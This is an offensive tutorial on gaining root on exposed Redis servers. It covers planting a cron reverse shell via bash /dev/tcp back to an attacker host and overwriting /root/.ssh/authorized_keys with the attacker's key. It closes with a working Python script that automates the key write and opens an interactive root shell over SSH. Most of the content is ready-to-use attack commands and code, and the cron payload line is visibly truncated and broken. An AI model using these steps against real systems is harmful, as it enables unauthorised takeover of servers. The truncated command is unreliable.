I. Reverse shell via a cron job
Use a scheduled task to run a command that calls back to you with a reverse shell.
When Redis runs as root, you can write a crontab entry through it to execute that command. Note: on Linux, crontab is what runs programs on a schedule. The value you store must begin and end with a newline so the cron line is separated from the binary RDB header and trailer that surround it in the dump. The cron spool path also depends on the distribution (/var/spool/cron/ on CentOS/RHEL, /var/spool/cron/crontabs/ on Debian/Ubuntu), and Debian-family cron rejects a crontab containing the dump's binary garbage, so this variant is reliable mainly on CentOS.
First listen on a port on your own server with nc -lvnp 7999, then run:
root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.12E
192.168.63.130:6379> config set dir /var/spool/cron/
192.168.63.130:6379> config set dbfilename root
192.168.63.130:6379> save
II. Writing an SSH public key
1. Generate an RSA key pair
ssh-keygen -t rsa
2. Write the public key into foo.txt; note that two newlines must be added before and after the content
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
3. Store foo.txt in the key crackit
cat foo.txt | redis-cli -h IP -x set crackit
4. Connect to the target
redis-cli -h IP
5. Change the target's Redis configuration:
6. Set the dump directory to /root/.ssh/ (the path where the public key will be stored)
192.168.1.11:6379> config set dir /root/.ssh/
OK
7. Set the dump filename to authorized_keys
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
8. Save; the public key is now written to the target as authorized_keys
192.168.1.11:6379> save
OK
9. Connect to the target with the private key
ssh -i /root/.ssh/id_rsa root@192.168.1.11
This requires Redis to be running as root (or as a user whose ~/.ssh you target instead), the .ssh directory must already exist (config set dir fails otherwise), sshd must permit key-based root login, and save overwrites whatever authorized_keys was already there, which is noisy and destructive on a real target.
For the detailed procedure see: https://www.cnblogs.com/hei-zi/p/14002135.html
10. Scripted version
# coding: utf-8
# Interactive Redis -> SSH shell
# usage: python3 redis_shell.py <ip>
import sys

import paramiko
import redis

rsa_pub = '/root/.ssh/id_rsa.pub'  # public key path
pkey = '/root/.ssh/id_rsa'         # private key path


# Read the public key and pad it with newlines so it lands on a line of its own in the dump
def get_id_rsa_pub():
    with open(rsa_pub, 'rt') as f:
        id_rsa_pub = '\n\n\n{}\n\n'.format(f.read())
    return id_rsa_pub


def shell_redis(ip):
    try:
        r = redis.Redis(host=ip, port=6379, socket_timeout=5)
        r.config_set('dir', '/root/.ssh/')
        print('[ok] : config set dir /root/.ssh/')
        r.config_set('dbfilename', 'authorized_keys')
        print('[ok] : config set dbfilename "authorized_keys"')
        id_rsa_pub = get_id_rsa_pub()
        r.set('crackit', id_rsa_pub)
        print('[ok] : set crackit')
        r.save()
        print('[ok] : save')
        # The dump is now /root/.ssh/authorized_keys; log in with the matching private key
        key = paramiko.RSAKey.from_private_key_file(pkey)
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(ip, port=22, username='root', pkey=key, timeout=5)
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('id')
        content = ssh_stdout.readlines()
        if content:
            print('[ok] connect to {}: {}'.format(ip, content[0].strip()))
            while True:
                command = input('{} >>> '.format(ip))
                ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command)
                for line in ssh_stdout.readlines():
                    print(line, end='')
    except Exception as e:
        error = e.args
        if error == ('',):
            error = 'save error'
        print('[-] [{}]: {}'.format(ip, error))


if __name__ == '__main__':
    ip = sys.argv[1]
    shell_redis(ip)